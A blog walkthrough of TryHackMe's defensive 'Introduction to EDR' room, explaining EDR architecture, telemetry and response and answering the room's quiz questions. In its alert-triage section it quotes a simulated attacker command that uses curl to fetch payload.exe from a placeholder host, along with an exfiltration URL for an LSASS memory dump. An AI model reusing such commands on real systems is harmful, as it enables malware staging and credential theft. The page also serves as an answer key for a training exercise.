Jasper Alblas
TryHackMe: Introduction to EDR Walkthrough (SOC Level 1)
Welcome to this walkthrough of the Introduction to EDR Room on TryHackMe. Endpoint Detection and Response (EDR) is a security solution designed to monitor, detect, and respond to advanced threats at the endpoint level. As a SOC analyst, it is essential for you to understand how the EDR works
Room URL:
https://tryhackme.com/room/introductiontoedrs
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Table of Contents
Task 1: Introduction
Endpoint Detection and Response (EDR) is a security solution designed to monitor, detect, and respond to advanced threats at the endpoint level. As a SOC analyst, it is essential for you to understand how the EDR works since it is a widely adopted solution in organizations to protect their endpoints. In this room, we will see how an EDR differs from a traditional antivirus and what data it collects from the endpoints. We will also discuss the detection and response capabilities it provides.
Learning Objectives
- Understand the basics of EDR and how it works
- Differentiate EDR from traditional Antivirus solutions
- Examine the architecture of an EDR solution
- Analyze the types of telemetry it collects from endpoints
- Understand the detection and response capabilities of an EDR
- Investigate a realistic alert in the EDR
Room Prerequisites
- Basic knowledge of different endpoints (Windows, Linux, Mac) and the common attacks on them
- Awareness of the role of the SOC team
Questions
I am all set!
Answer: No answer needed
Task 2: What is an EDR?
As businesses increasingly rely on digital devices for their core operations, cyber threats are growing just as fast. Traditional network security often protects systems within the corporate perimeter—but with the rise of remote work, many devices now operate outside that protection.
This is where Endpoint Detection and Response (EDR) comes in. EDR solutions provide deep, continuous monitoring and protection for endpoint devices—no matter where they are. They detect, investigate, and respond to threats in real time, ensuring devices remain secure even outside the network.
Popular EDR Solutions
Some leading EDR tools include:
- CrowdStrike Falcon
- SentinelOne ActiveEDR
- Microsoft Defender for Endpoint
- OpenEDR
- Symantec EDR
While their architectures are similar, features and interfaces may vary.
The Three Pillars of EDR
- Visibility – EDR provides unparalleled insight into endpoint activity, tracking processes, registry and file changes, and user behavior. Analysts can visualize process trees and access detailed historical data for threat hunting.
- Detection – Combining signature- and behavior-based methods, EDR detects suspicious activity, fileless malware, and deviations from normal behavior. Many tools map detections to MITRE ATT&CK tactics for better analysis.
- Response – Analysts can take direct action from the EDR console: isolate hosts, terminate processes, quarantine files, or connect remotely for investigation through real-time response (RTR) features.
Together, these pillars make EDR a cornerstone of modern cybersecurity operations. While it offers powerful endpoint protection, it’s worth noting that EDR focuses solely on hosts—it doesn’t detect network-level threats.
Questions
Which feature of EDR provides a complete context for all the detections?
The answer is visibility. This features ensures collection of detailed data from the endpoints, which includes process modifications, registry modifications, file and folder modifications, user actions, and much more. The analyst can see the whole process tree with a complete activity timeline of the sequence of actions. Any detections in the EDR land with a whole context.
Answer: Visibility
Which process spawned sc.exe?
For this we should look at the process tree screenshot on THM.
We can see which processes were spawned on the endpoint. Each node represents a process. The lines connecting them represents their relationship.
You can see the sc.exe process on the right. It is spawned by the cmd.exe process.
Answer: cmd.exe
Task 3: Beyond the Antivirus
Why EDR Is Needed Beyond Antivirus
- Antivirus (AV) provides basic protection by detecting known threats using signature-based methods.
- Endpoint Detection and Response (EDR) offers advanced protection by continuously monitoring endpoint behavior and detecting suspicious activities—even those that bypass AV.
Airport Analogy
- AV = Immigration Check: Blocks known threats based on a database of signatures.
- EDR = Security Officers: Monitors ongoing behavior inside the endpoint, detects anomalies, and responds to threats that AV misses.
Behavioral Monitoring Advantages of EDR
- Tracks process relationships, memory injections, and network activity.
- Provides visibility across all endpoints in an organization.
- Enables proactive threat hunting and incident response.
AV vs EDR: Attack Scenario Comparison
Attack Step | AV Response | EDR Response |
|---|---|---|
| Phishing email with malicious Word doc | Ignores if no known signature | Logs and monitors download |
| Document opened | Ignores legitimate app | Records execution of Word |
| Macro spawns PowerShell | Ignores unknown macro | Flags unusual process behavior |
| Obfuscated PowerShell script | Typically undetected | Flags obfuscated script |
| Payload injected into svchost.exe | No memory monitoring | Detects process injection |
| Remote access gained | No network visibility | Flags outbound connection |
| Final Action | May mark as clean | Alerts full attack chain for response |
Questions
In the given analogy, what presents an AV?
In the airport analogy, antivirus systems are like an immigration check. They keep an eye on who comes in, but when the person is in they don’t care anymore.
Answer: immigration check
Which legitimate process was hijacked by the attacker in the scenario?
In step 5 of the scenario the payload is injected into a legitimate svchost.exe. The injection in legitimate system processes is often done to hide a payload.
Answer: svchost.exe
Which security solution might mark this activity as clean?
Antivirus solutions will not flag malicious injection into svchost.exe since it does not monitor the memory injection. An EDR would very likely catch this activity.
Answer: antivirus
Task 4: How an EDR works?
How EDR Works Behind the Scenes
EDR Agents
- Deployed on endpoints as sensors.
- Monitor all activities and send detailed data to the central console in real time.
- Perform basic signature and behavior-based threat detection.
EDR Console
- Centralized dashboard that receives and analyzes data from agents.
- Uses machine learning and threat intelligence to correlate events and generate alerts.
- Provides a holistic view of endpoint security status.
What Happens After Detection
- SOC analysts review alerts and prioritize based on severity (Critical to Informational).
- Analysts investigate alerts using detailed logs: file executions, processes, network activity, registry changes.
- If confirmed as a true threat, analysts can take direct action from the console to contain or remediate.
EDR in the Broader Security Ecosystem
- EDR works alongside other tools like Firewalls, DLPs, Email Security Gateways, and IAMs.
- All tools feed into a SIEM (Security Information and Event Management) system for centralized analysis and response.
Questions
Which component of the EDR is responsible for collecting telemetry from the endpoints?
EDR agents collect data from the endpoints (systems).
Answer: Agent
An EDR agent is also known as a?
Since EDR agents collect data, similar to fx a temperature sensor collects temperature data, we also call them sensors.
Answer: sensor
Task 5: EDR Telemetry
What Is Telemetry?
- Telemetry is the detailed data collected by EDR agents from endpoints.
- It acts like a black box, capturing everything needed for threat detection and investigation.
Types of Collected Telemetry
- Process Executions and Terminations: Tracks all running and idle processes to spot suspicious behavior.
- Network Connections: Monitors endpoint traffic to detect C2 servers, unusual ports, or lateral movement.
- Command Line Activity: Captures commands in CMD, PowerShell, etc., to flag obfuscated or malicious scripts.
- Files and Folders Modifications: Detects changes linked to ransomware, data staging, or malware drops.
- Registry Modifications: Observes changes in Windows registry often tied to malicious activity.
Why Telemetry Matters
- Helps distinguish between legitimate and malicious activity.
- Enables machine learning and threat intelligence to detect stealthy threats.
- Supports analysts in reconstructing attack timelines, identifying root causes, and making informed decisions.
Questions
Which telemetry data helps in detecting C2 communications?
C2 communications to a C2 server have to go through the network, so network connections are essential in identifying this.
Answer: Network Connections
Where are the configuration settings of a Windows system primarily stored?
Configuration settings on Windows systems are stored in the registry. Changes in Windows registry are often tied to malicious activity.
Answer: registry
Task 6: Detection And Response Capabilities
Detection Techniques in EDR
- Behavioral Detection: Flags suspicious behavior patterns, like Word spawning PowerShell, even if files appear clean.
- Anomaly Detection: Identifies deviations from normal endpoint behavior, helping spot stealthy threats.
- IOC Matching: Uses threat intelligence feeds to detect known malicious indicators like file hashes.
- MITRE ATT&CK Mapping: Aligns flagged activities with tactics and techniques for better threat context.
- Machine Learning Algorithms: Detects complex, multi-stage attacks by analyzing patterns across large datasets.
Response Capabilities in EDR
- Isolate Host: Disconnects infected endpoints from the network to prevent lateral movement.
- Terminate Process: Stops malicious processes without isolating the host, preserving business operations.
- Quarantine: Moves suspicious files to a safe location for review or removal.
- Remote Access: Enables analysts to access endpoint shells for deeper investigation and custom actions.
- Artefacts Collection: Gathers forensic data like memory dumps, event logs, and registry hives remotely.
Questions
Which feature of the EDR helps you identify threats based on known malicious behaviours?
Known malicious behaviours are grouped within the cybersecurity world as IOCs. In other words: Indicators of Compromise are forensic clues left by a cyberattack that help identify a security breach. Examples include suspicious file hashes, malicious IP addresses, and unusual registry keys. EDRs can do something called IOC Matching to identify threats.
Answer: IOC Matching
Task 7: Investigate an alert on EDR
Scenario
You are a SOC analyst at TECH THM with access to the EDR console, having multiple medium and high-severity detections. Your task is to perform triage on each detection using the available information in the EDR and answer a series of questions related to these detections.
Click on the View Site button to display the static site. We are met by a EDR Dashboard:
Questions
Which tool was launched by CMD.exe to download the payload on DESKTOP-HR01?
If we take a look at the four detections, we can see the top one relates to host DESKTOP-HR01:
Click on it to see details:
We can read in the description that the document triggered cURL:
A macro-enabled Office document (
invoice.docm) was opened usingWINWORD.EXE. The document triggered CMD, which launched cURL to download a payload from an external domain. The file was saved to disk but never executed — behavior consistent with malware staging tactics.
To get the exact process name it is easier to open the Process Info tab.
Here we can find the exact answer: cURL.exe.
Answer: cURL.exe
What is the absolute path to the downloaded malware on the DESKTOP-HR01 machine?
This answer can be found on the same screen. Take a look at the command line command:
cmd.exe /c curl http://ayebd.thm/payload.exe -o C:\Users\Public\install.exeWe can see the payload being downloaded with curl, and the location where it is saved.
Answer: C:\Users\Public\install.exe
What is the absolute path to the suspicious syncsvc.exe on the WIN-ENG-LAPTOP03 machine?
Time to look at another incident, this time the one called Credential Dumping via LSASS Memory Access on WIN-ENG-LAPTOP03.
Once more we need to look at the Process Info tab to find the answer. It is found under Path when looking at the syncsvc.exe process.
On which URL was the exfiltration attempt being made on WIN-ENG-LAPTOP03?
We can find this answer on the same screen, under Network Activity. Here the EDR dashboard states:
Attempted exfil to: https://files-wetransfer.com/upload/session/ab12cd34ef56/dump_2025.dmpAnswer: https://files-wetransfer.com/upload/session/ab12cd34ef56/dump_2025.dmp
What was UpdateAgent.exe labelled by Threat Intel on DESKTOP-DEV01?
Change to the detection Execution from AppData Directory on DESKTOP-DEV01. Enter the process Info tab and find the UpdateAgent.exe process:
Here you will see that the Threat Intel section mentions:
Known internal IT utility tool
Answer: Known internal IT utility tool
Task 8: Conclusion
Congratulations! We have learned one of the essential tools used in the Security Operations Center (SOC), Endpoint Detection and Response (EDR). As a SOC analyst, we now understand the basic architecture of EDR and its capabilities beyond Antivirus. We explored the detailed telemetry that an EDR provides. We also saw the powerful detection and response capabilities of EDR solutions. Lastly, we practiced investigating some detections on a simulated EDR.
This sets a strong baseline for working with essential security solutions. In the upcoming rooms of this module, we will explore some other security solutions that a SOC analyst works on in a Security Operations Center (SOC).
Questions
Complete the room.
Answer: No answer needed.
Congratulations on completing Introduction to EDR!!!
Congratulations on completing Introduction to EDR. I think this basic room provided a nice and quick introduction to EDR systems, and how they related to SIEM solutions. I particularly enjoyed the last few tasks. I hope you agree 🙂
Come back soon for more walkthroughs of rooms on TryHackMe and HackTheBox, and other Cybersecurity discussions.
Find other walkthroughs of the TryHackMe SOC Level 1 Path here.
Find my other walkthroughs here.
Like my articles?
You are welcome to comment on this post, or share my post with friends.I would be even more grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:
[…] Introduction to EDR […]